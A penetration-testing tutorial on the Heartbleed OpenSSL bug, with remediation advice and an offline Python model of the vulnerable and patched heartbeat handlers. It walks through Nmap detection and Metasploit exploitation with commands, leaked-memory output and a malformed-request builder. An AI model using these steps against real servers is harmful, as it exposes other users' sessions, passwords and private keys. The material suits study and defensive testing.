
HEARTBLEED

TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.

 

 

Heartbleed (CVE-2014-0160), disclosed in April 2014, is a bug in the TLS heartbeat extension code of OpenSSL 1.0.1 through 1.0.1f. Because OpenSSL sits behind a large share of the world's HTTPS, mail and VPN endpoints, it was one of those exploits so impactful to so many systems that it sent waves through the IT industry.

 

Heartbleed is very simple to exploit and can be very damaging. A TLS heartbeat request carries a 16-bit payload length field; vulnerable OpenSSL trusted that field instead of checking it against the size of the record it actually received, so a client that sends a tiny heartbeat claiming a payload of up to 65535 bytes gets back up to 64 KB of whatever happens to sit in the server process's heap next to the request buffer. No credentials are needed, the heartbeat is sent in the clear before the handshake completes, and the request leaves nothing in the application's logs.

 

The easiest way to find vulnerable systems is with Nmap's ssl-heartbleed NSE script. It does not guess from version banners: it sends a malformed heartbeat and reports VULNERABLE only when the server echoes back data it never received. Port 443 is the usual target, but any TLS service (SMTPS, IMAPS, POP3S, STARTTLS ports) can be checked the same way. Run the following command on your Linux system:

 

# nmap -p 443 --script ssl-heartbleed <target(s)>

PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE

<snip>

 

As you can see, the script has confirmed a vulnerable system.

 

Next, to exploit this, launch Metasploit. Remember to start the database service first so that hosts and loot are saved to the workspace (the module itself also runs without a database):

 

# service postgresql start

/opt/metasploit/app# ./msfconsole

 

Once launched, use the following commands to load and run the Heartbleed module. VERBOSE is what makes the module print the leaked bytes to the console:

 

msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set VERBOSE true
VERBOSE => true
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(openssl_heartbleed) > run

[*] 192.168.1.1:443 Sending Client Hello...
[*] 192.168.1.1:443 Sending Heartbeat...
[*] 192.168.1.1:443 Heartbeat response, checking if there is data leaked...
[+] 192.168.1.1:443 Heartbeat response with leak
[*] 192.168.1.1:443 Printable info leaked:
@SKO0'94wiW*G):[f"!98532ED/Ait/537.36 (KHTML, like Gecko)
Chrome/34.0.1847.116 Safari/537.36Accept

<snip>

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

You will notice here that Metasploit completed a Client Hello with the server, sent a single heartbeat and was able to pull data straight out of the server's memory; the fragment above is part of another user's HTTP request (a Chrome User-Agent header) that was still sitting in the heap. The important thing to note is that the data is whatever happens to be adjacent to the heartbeat buffer at that moment, not something the attacker chooses. There is no guarantee that you will find account credentials, session cookies or other critical data on any given run, but each request leaks up to 64 KB, it can be repeated as often as you like, and nothing stops you from scripting thousands of requests and searching the output. The module's DUMP action saves every leak to loot for offline grepping, its KEYS action tries to reconstruct the server's RSA private key from the leaked memory, and TLS_CALLBACK lets it negotiate STARTTLS against mail and other non-HTTPS services. That is the real danger: given enough attempts, session tokens, passwords and even the private key behind the certificate can surface. Remediation is therefore not just upgrading OpenSSL to 1.0.1g or later (or rebuilding with -DOPENSSL_NO_HEARTBEATS); because the key may already have been read, certificates should be reissued and any credentials that passed through the server should be rotated.
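The mechanism behind the "very simple to exploit" claim above, and the reason the leaked data is arbitrary, can be shown without a live target. The following is an added example written for this page; it is not code from the original article, from OpenSSL or from the Metasploit module. It builds the heartbeat record an attacker sends (a payload_length that is far larger than the payload actually present), models the pre-1.0.1g OpenSSL handler that trusts that field beside the patched handler that bounds-checks it against the received record length, and runs both over a constructed fake heap so the over-read is visible. The names fake_heap, simulate and the "constructed-secret" cookie are assumptions made for the demo; the TLS record layout and heartbeat message format follow RFC 6520.

```python
"""Heartbleed (CVE-2014-0160) mechanics modelled offline.

Added example, not from the original page, OpenSSL or Metasploit. The TLS
record and HeartbeatMessage layouts follow RFC 6520; `fake_heap`, `simulate`
and the secret string are constructed for the demonstration.
"""
import struct

CONTENT_TYPE_HEARTBEAT = 24        # TLS ContentType for the heartbeat extension
HB_REQUEST, HB_RESPONSE = 1, 2     # HeartbeatMessageType values
TLS_1_2 = (3, 3)
MIN_PADDING = 16                   # RFC 6520: at least 16 bytes of random padding


def tls_record(content_type, body, version=TLS_1_2):
    """Prefix `body` with the 5-byte TLS record header: type, version, length."""
    return struct.pack("!BBBH", content_type, version[0], version[1], len(body)) + body


def heartbeat_request(claimed_len, payload=b"", padding=b"\x00" * MIN_PADDING):
    """HeartbeatRequest whose payload_length claims `claimed_len` bytes regardless
    of how many payload bytes actually follow. claimed_len=0x4000 with an empty
    payload is the classic probe: a vulnerable server echoes 16 KiB it never got."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + padding
    return tls_record(CONTENT_TYPE_HEARTBEAT, body)


def parse_records(stream):
    """Split a byte stream into (content_type, (major, minor), body) TLS records."""
    records, off = [], 0
    while off + 5 <= len(stream):
        ctype, vmaj, vmin, length = struct.unpack("!BBBH", stream[off:off + 5])
        body = stream[off + 5:off + 5 + length]
        if len(body) < length:
            break                      # truncated record: stop rather than misparse
        records.append((ctype, (vmaj, vmin), body))
        off += 5 + length
    return records


def handle_heartbeat_vulnerable(heap, rec_off, rec_len):
    """Model of OpenSSL 1.0.1-1.0.1f tls1_process_heartbeat: reads the 16-bit
    payload_length from the message and copies that many bytes starting at the
    payload pointer, never comparing it with the record length rec_len."""
    hb_type = heap[rec_off]
    payload_len = struct.unpack("!H", heap[rec_off + 1:rec_off + 3])[0]
    pl = rec_off + 3
    if hb_type != HB_REQUEST:
        return b""
    # Over-read: pl + payload_len runs past rec_off + rec_len into neighbouring
    # memory. (Python slicing stops at the end of the buffer; C memcpy does not.)
    echoed = bytes(heap[pl:pl + payload_len])
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * MIN_PADDING


def handle_heartbeat_fixed(heap, rec_off, rec_len):
    """Same handler with the two checks OpenSSL 1.0.1g added: discard the message
    if it cannot even hold type+length+padding, or if the claimed payload plus
    padding does not fit inside the record that was actually received."""
    if 1 + 2 + MIN_PADDING > rec_len:
        return b""
    hb_type = heap[rec_off]
    payload_len = struct.unpack("!H", heap[rec_off + 1:rec_off + 3])[0]
    if 1 + 2 + payload_len + MIN_PADDING > rec_len:
        return b""                     # the bounds check that was missing
    pl = rec_off + 3
    if hb_type != HB_REQUEST:
        return b""
    echoed = bytes(heap[pl:pl + payload_len])
    return struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + b"\x00" * MIN_PADDING


def simulate(claimed_len, neighbour=b"Cookie: session=constructed-secret-123\r\n"):
    """Place a crafted heartbeat body in a constructed fake heap directly before
    some unrelated data (here a made-up cookie from another client's request),
    run both handlers and return (vulnerable_response, fixed_response)."""
    request = heartbeat_request(claimed_len)
    body = parse_records(request)[0][2]           # strip the TLS record header
    fake_heap = bytearray(body + neighbour)       # neighbour sits right after the record
    rec_off, rec_len = 0, len(body)
    return (handle_heartbeat_vulnerable(fake_heap, rec_off, rec_len),
            handle_heartbeat_fixed(fake_heap, rec_off, rec_len))


if __name__ == "__main__":
    leaked, patched = simulate(0x4000)
    print("vulnerable handler echoed %d bytes: %r" % (len(leaked), leaked[3:-MIN_PADDING]))
    print("patched handler echoed %d bytes" % len(patched))
```

Run it and the vulnerable handler hands back the neighbouring cookie along with the request's own padding, while the patched handler returns nothing for the same bytes; pass a truthful length (simulate(0)) and both handlers answer identically, which is why the fix broke no legitimate clients. What makes the real bug so cheap is visible in the request builder: the whole attack is a 24-byte record with a lying length field, and the server does all the work.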